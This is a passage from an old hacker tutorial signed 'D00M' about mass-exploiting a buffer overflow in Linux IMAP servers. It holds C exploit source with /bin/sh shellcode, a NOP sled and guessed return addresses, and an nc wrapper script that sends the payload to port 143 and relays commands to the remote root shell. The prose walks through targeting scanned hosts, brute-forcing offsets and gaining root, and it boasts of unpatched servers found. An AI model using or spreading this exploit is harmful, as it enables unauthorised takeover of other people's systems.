"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh";

char username[1024+255];

int main(int argc, char *argv[])
{
    int i, a;
    long val;

    /* the optional argument is the offset added to the guessed stack address */
    if (argc > 1)
        a = atoi(argv[1]);
    else
        a = 0;

    /* sled + shellcode first, the rest of the buffer padded with NOPs */
    strcpy(username, shell);
    for (i = strlen(username); i < (int)sizeof(username); i++)
        username[i] = 0x90;                /* NOP */
    username[sizeof(username) - 1] = 0;

    /* from byte 1024 on, repeat the return address (little endian) */
    val = 0xbffff501 + a;
    for (i = 1024; i < (int)strlen(username) - 4; i += 4) {
        username[i+0] = val & 0x000000ff;
        username[i+1] = (val & 0x0000ff00) >> 8;
        username[i+2] = (val & 0x00ff0000) >> 16;
        username[i+3] = (val & 0xff000000) >> 24;
    }

    /* the oversized username goes out as an IMAP LOGIN command */
    printf("%d LOGIN \"%s\" pass\n", (int)sizeof(shell), username);
    return 0;
}
--------------------------------------------Cut here-----------------------------------------------------

Then use the following shell script to test each of the hosts in your imapdlog file. It calls the imapd binary you just compiled, so keep that in your path (or change the two calls to ./imapd):

imapd-exp.sh
--------------------------------------------Cut here-----------------------------------------------------
#!/bin/sh
# Top offsets, by b0fh: 0,40,30,10,-10,100,200
# sends the overflow, then forwards whatever you type to the shell on the other end
if [ $# -eq '1' ]; then
    echo "using offset 0"
    ( imapd 0; while /bin/true; do read L; echo $L; done ) | nc $1 143
else
    if [ $# -eq '2' ]; then
        echo "using offset $2"
        ( imapd $2; while /bin/true; do read L; echo $L; done ) | nc $1 143
    else
        echo "Usage: $0 <host> [<offset>]"
    fi
fi
--------------------------------------------Cut here-----------------------------------------------------

Don't forget that the imapd exploit only works for Linux/intel machines, so the best thing to do is telnet to each of the IPs in the imapdlog file and see what system the machine is running.

Let's now see two examples. Run the shell script called imapd-exp.sh like this:

machine% imapd-exp.sh victim.com

This will try offset 0 on the victim.com machine, and a message like this should appear:

using offset 0

followed by the imapd response from the machine. There is no local echo, so type blind:

/bin/bash -i

If the machine is not exploitable an error message should appear saying you have typed an invalid command and asking you to authenticate. If not, and offset 0 was the right one, you should get a root bash on your screen, something like this:

#

If nothing happens and no error message is given, then try some more offsets; use the ones given in the shell script (40,30,10,-10,100,200), and if none is good then keep trying, because you own root there.

I scanned imapd on some primary domains and the results were great: lots of servers still not patched. Only RedHat 4.2 was released with the bug fixed, and older kernels on RedHat distributions, like 4.0 and 4.1, were vulnerable to the exploit. My success on Slackware wasn't so great, but still some 2.0.27 were caught.
I'm preparing a perl script to take the imapdlog file and pick out the ones that fit the bug (Linux kernels), and in a future release I will distribute it.

Well, that's all for today. There's much more mass stuff around out there, but for now this should do.

All the source code here was taken from someone else's mind, and all the authors' names were respected.

Thanks to Kore, the GFX Guru, for the D00M logo.

Greetings, fellows of the "art".

I'm D00M, Master of Perversion
Mail d00mster@usa.net
Visit: PtNeet channels #hackers and #hackers_hideout, Darknet channel #hack

D00M Over and Out
------------------------------------------------------
by D00M